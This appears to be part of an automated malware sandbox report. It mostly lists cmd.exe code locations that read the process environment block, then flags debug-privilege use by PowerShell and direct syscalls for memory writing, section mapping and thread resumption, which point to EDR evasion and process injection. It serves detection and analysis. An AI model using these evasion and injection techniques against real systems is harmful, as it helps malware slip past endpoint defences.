Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03186420 mov eax, dword ptr fs:[00000030h] 12_2_03186420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03186420 mov eax, dword ptr fs:[00000030h] 12_2_03186420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03186420 mov eax, dword ptr fs:[00000030h] 12_2_03186420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03186420 mov eax, dword ptr fs:[00000030h] 12_2_03186420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03186420 mov eax, dword ptr fs:[00000030h] 12_2_03186420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03186420 mov eax, dword ptr fs:[00000030h] 12_2_03186420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03186420 mov eax, dword ptr fs:[00000030h] 12_2_03186420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312245A mov eax, dword ptr fs:[00000030h] 12_2_0312245A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BA456 mov eax, dword ptr fs:[00000030h] 12_2_031BA456
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h] 12_2_0313E443
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h] 12_2_0313E443
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h] 12_2_0313E443
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h] 12_2_0313E443
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h] 12_2_0313E443
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h] 12_2_0313E443
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h] 12_2_0313E443
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h] 12_2_0313E443
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F645D mov eax, dword ptr fs:[00000030h] 12_2_030F645D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h] 12_2_0312A470
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h] 12_2_0312A470
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h] 12_2_0312A470
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318C460 mov ecx, dword ptr fs:[00000030h] 12_2_0318C460
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BA49A mov eax, dword ptr fs:[00000030h] 12_2_031BA49A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031344B0 mov ecx, dword ptr fs:[00000030h] 12_2_031344B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318A4B0 mov eax, dword ptr fs:[00000030h] 12_2_0318A4B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031064AB mov eax, dword ptr fs:[00000030h] 12_2_031064AB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031004E5 mov ecx, dword ptr fs:[00000030h] 12_2_031004E5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h] 12_2_0317EB1D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4B00 mov eax, dword ptr fs:[00000030h] 12_2_031D4B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312EB20 mov eax, dword ptr fs:[00000030h] 12_2_0312EB20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312EB20 mov eax, dword ptr fs:[00000030h] 12_2_0312EB20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C8B28 mov eax, dword ptr fs:[00000030h] 12_2_031C8B28
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C8B28 mov eax, dword ptr fs:[00000030h] 12_2_031C8B28
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AEB50 mov eax, dword ptr fs:[00000030h] 12_2_031AEB50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h] 12_2_031D2B57
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h] 12_2_031D2B57
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h] 12_2_031D2B57
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h] 12_2_031D2B57
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B4B4B mov eax, dword ptr fs:[00000030h] 12_2_031B4B4B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B4B4B mov eax, dword ptr fs:[00000030h] 12_2_031B4B4B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A8B42 mov eax, dword ptr fs:[00000030h] 12_2_031A8B42
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03196B40 mov eax, dword ptr fs:[00000030h] 12_2_03196B40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03196B40 mov eax, dword ptr fs:[00000030h] 12_2_03196B40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CAB40 mov eax, dword ptr fs:[00000030h] 12_2_031CAB40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F8B50 mov eax, dword ptr fs:[00000030h] 12_2_030F8B50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FCB7E mov eax, dword ptr fs:[00000030h] 12_2_030FCB7E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B4BB0 mov eax, dword ptr fs:[00000030h] 12_2_031B4BB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B4BB0 mov eax, dword ptr fs:[00000030h] 12_2_031B4BB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110BBE mov eax, dword ptr fs:[00000030h] 12_2_03110BBE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110BBE mov eax, dword ptr fs:[00000030h] 12_2_03110BBE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AEBD0 mov eax, dword ptr fs:[00000030h] 12_2_031AEBD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h] 12_2_03120BCB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h] 12_2_03120BCB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h] 12_2_03120BCB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h] 12_2_03100BCD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h] 12_2_03100BCD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h] 12_2_03100BCD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h] 12_2_03108BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h] 12_2_03108BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h] 12_2_03108BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318CBF0 mov eax, dword ptr fs:[00000030h] 12_2_0318CBF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312EBFC mov eax, dword ptr fs:[00000030h] 12_2_0312EBFC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318CA11 mov eax, dword ptr fs:[00000030h] 12_2_0318CA11
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03124A35 mov eax, dword ptr fs:[00000030h] 12_2_03124A35
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03124A35 mov eax, dword ptr fs:[00000030h] 12_2_03124A35
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313CA24 mov eax, dword ptr fs:[00000030h] 12_2_0313CA24
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312EA2E mov eax, dword ptr fs:[00000030h] 12_2_0312EA2E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h] 12_2_03106A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h] 12_2_03106A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h] 12_2_03106A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h] 12_2_03106A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h] 12_2_03106A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h] 12_2_03106A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h] 12_2_03106A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110A5B mov eax, dword ptr fs:[00000030h] 12_2_03110A5B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110A5B mov eax, dword ptr fs:[00000030h] 12_2_03110A5B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317CA72 mov eax, dword ptr fs:[00000030h] 12_2_0317CA72
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317CA72 mov eax, dword ptr fs:[00000030h] 12_2_0317CA72
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AEA60 mov eax, dword ptr fs:[00000030h] 12_2_031AEA60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h] 12_2_0313CA6F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h] 12_2_0313CA6F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h] 12_2_0313CA6F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03138A90 mov edx, dword ptr fs:[00000030h] 12_2_03138A90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h] 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4A80 mov eax, dword ptr fs:[00000030h] 12_2_031D4A80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03108AA0 mov eax, dword ptr fs:[00000030h] 12_2_03108AA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03108AA0 mov eax, dword ptr fs:[00000030h] 12_2_03108AA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03156AA4 mov eax, dword ptr fs:[00000030h] 12_2_03156AA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03100AD0 mov eax, dword ptr fs:[00000030h] 12_2_03100AD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03134AD0 mov eax, dword ptr fs:[00000030h] 12_2_03134AD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03134AD0 mov eax, dword ptr fs:[00000030h] 12_2_03134AD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h] 12_2_03156ACC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h] 12_2_03156ACC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h] 12_2_03156ACC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313AAEE mov eax, dword ptr fs:[00000030h] 12_2_0313AAEE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313AAEE mov eax, dword ptr fs:[00000030h] 12_2_0313AAEE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318C912 mov eax, dword ptr fs:[00000030h] 12_2_0318C912
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F8918 mov eax, dword ptr fs:[00000030h] 12_2_030F8918
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F8918 mov eax, dword ptr fs:[00000030h] 12_2_030F8918
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E908 mov eax, dword ptr fs:[00000030h] 12_2_0317E908
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E908 mov eax, dword ptr fs:[00000030h] 12_2_0317E908
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318892A mov eax, dword ptr fs:[00000030h] 12_2_0318892A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0319892B mov eax, dword ptr fs:[00000030h] 12_2_0319892B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4940 mov eax, dword ptr fs:[00000030h] 12_2_031D4940
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03180946 mov eax, dword ptr fs:[00000030h] 12_2_03180946
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A4978 mov eax, dword ptr fs:[00000030h] 12_2_031A4978
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A4978 mov eax, dword ptr fs:[00000030h] 12_2_031A4978
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318C97C mov eax, dword ptr fs:[00000030h] 12_2_0318C97C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03126962 mov eax, dword ptr fs:[00000030h] 12_2_03126962
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03126962 mov eax, dword ptr fs:[00000030h] 12_2_03126962
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03126962 mov eax, dword ptr fs:[00000030h] 12_2_03126962
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0314096E mov eax, dword ptr fs:[00000030h] 12_2_0314096E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0314096E mov edx, dword ptr fs:[00000030h] 12_2_0314096E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0314096E mov eax, dword ptr fs:[00000030h] 12_2_0314096E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031889B3 mov esi, dword ptr fs:[00000030h] 12_2_031889B3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031889B3 mov eax, dword ptr fs:[00000030h] 12_2_031889B3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031889B3 mov eax, dword ptr fs:[00000030h] 12_2_031889B3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h] 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031009AD mov eax, dword ptr fs:[00000030h] 12_2_031009AD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031009AD mov eax, dword ptr fs:[00000030h] 12_2_031009AD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0310A9D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0310A9D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0310A9D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0310A9D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0310A9D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h] 12_2_0310A9D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031349D0 mov eax, dword ptr fs:[00000030h] 12_2_031349D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CA9D3 mov eax, dword ptr fs:[00000030h] 12_2_031CA9D3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031969C0 mov eax, dword ptr fs:[00000030h] 12_2_031969C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031329F9 mov eax, dword ptr fs:[00000030h] 12_2_031329F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031329F9 mov eax, dword ptr fs:[00000030h] 12_2_031329F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318E9E0 mov eax, dword ptr fs:[00000030h] 12_2_0318E9E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318C810 mov eax, dword ptr fs:[00000030h] 12_2_0318C810
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A483A mov eax, dword ptr fs:[00000030h] 12_2_031A483A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A483A mov eax, dword ptr fs:[00000030h] 12_2_031A483A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A830 mov eax, dword ptr fs:[00000030h] 12_2_0313A830
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03122835 mov eax, dword ptr fs:[00000030h] 12_2_03122835
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03122835 mov eax, dword ptr fs:[00000030h] 12_2_03122835
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03122835 mov eax, dword ptr fs:[00000030h] 12_2_03122835
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03122835 mov ecx, dword ptr fs:[00000030h] 12_2_03122835
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03122835 mov eax, dword ptr fs:[00000030h] 12_2_03122835
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03122835 mov eax, dword ptr fs:[00000030h] 12_2_03122835
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03130854 mov eax, dword ptr fs:[00000030h] 12_2_03130854
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03104859 mov eax, dword ptr fs:[00000030h] 12_2_03104859
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03104859 mov eax, dword ptr fs:[00000030h] 12_2_03104859
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03112840 mov ecx, dword ptr fs:[00000030h] 12_2_03112840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03196870 mov eax, dword ptr fs:[00000030h] 12_2_03196870
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03196870 mov eax, dword ptr fs:[00000030h] 12_2_03196870
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
